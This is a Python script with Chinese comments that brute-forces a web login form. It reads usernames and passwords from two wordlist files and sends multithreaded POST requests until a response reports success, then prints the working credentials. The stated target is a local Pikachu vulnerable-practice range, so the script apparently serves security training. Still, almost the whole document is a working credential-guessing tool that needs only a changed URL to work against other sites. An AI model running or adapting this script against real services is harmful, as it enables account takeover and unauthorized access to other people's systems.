注意:需要在同目录下创建两个字典,一个是users.txt,一个是passwds.txt,运行该脚本时会从这两个文件内读取用户名与密码
import os
import threading
import requests
# 定义分块大小
BLOCK_SIZE = 800
def pertition(ls, size):
return [ls[i:i + size] for i in range(0, len(ls), size)]
# 创建子线程任务类
class ThreadWork:
# 目标url
url = 'http://127.0.0.1/pikachu/vul/burteforce/bf_form.php'
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.8',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0'
}
# 构造变量初始化
def __init__(self, username, userpwsd):
self.username = username
self.userpwsd = userpwsd
# 对传入的用户名与密码进行暴力破解
def run(self, username, userpwsd):
data = {
'username': username,
'password': userpwsd,
'submit': 'Login'
}
print('username:{}, password:{}'.format(username, userpwsd))
# 对pikachu靶场发起post请求
response = requests.post(self.url, data=data, headers=self.headers)
if 'exists' in response.text:
pass
elif 'success' in response.text:
print('success!username:{} password:{}'.format(username, userpwsd))
os._exit(0)
else:
pass
def start(self):
for userItem in self.username:
for pwsdItem in self.userpwsd:
self.run(userItem, pwsdItem)
# 对传入的用户名和密码进行切割,创建子线程
def BruteForceHttp():
# 读取用户名账户和用户名密码,进行切块处理
listusername = [line.strip() for line in open('./users.txt', 'r', encoding='gbk')]
blockUsername = pertition(listusername, BLOCK_SIZE)
listuserpasd = [line.strip() for line in open('./passwds.txt', 'r', encoding='gbk')]
blockUserpasd = pertition(listuserpasd, BLOCK_SIZE)
threads = []
for user in blockUsername:
for pasd in blockUserpasd:
# 传入账号子模块和密码子模块实例化任务
work = ThreadWork(user, pasd)
# 创建进程
workthread = threading.Thread(target=work.start)
# 在threads中加入线程
threads.append(workthread)
# 运行线程
for t in threads:
t.start()
# 阻塞线程,当所有子线程完成工作后运行
for t in threads:
t.join()
if __name__ == '__main__':
BruteForceHttp()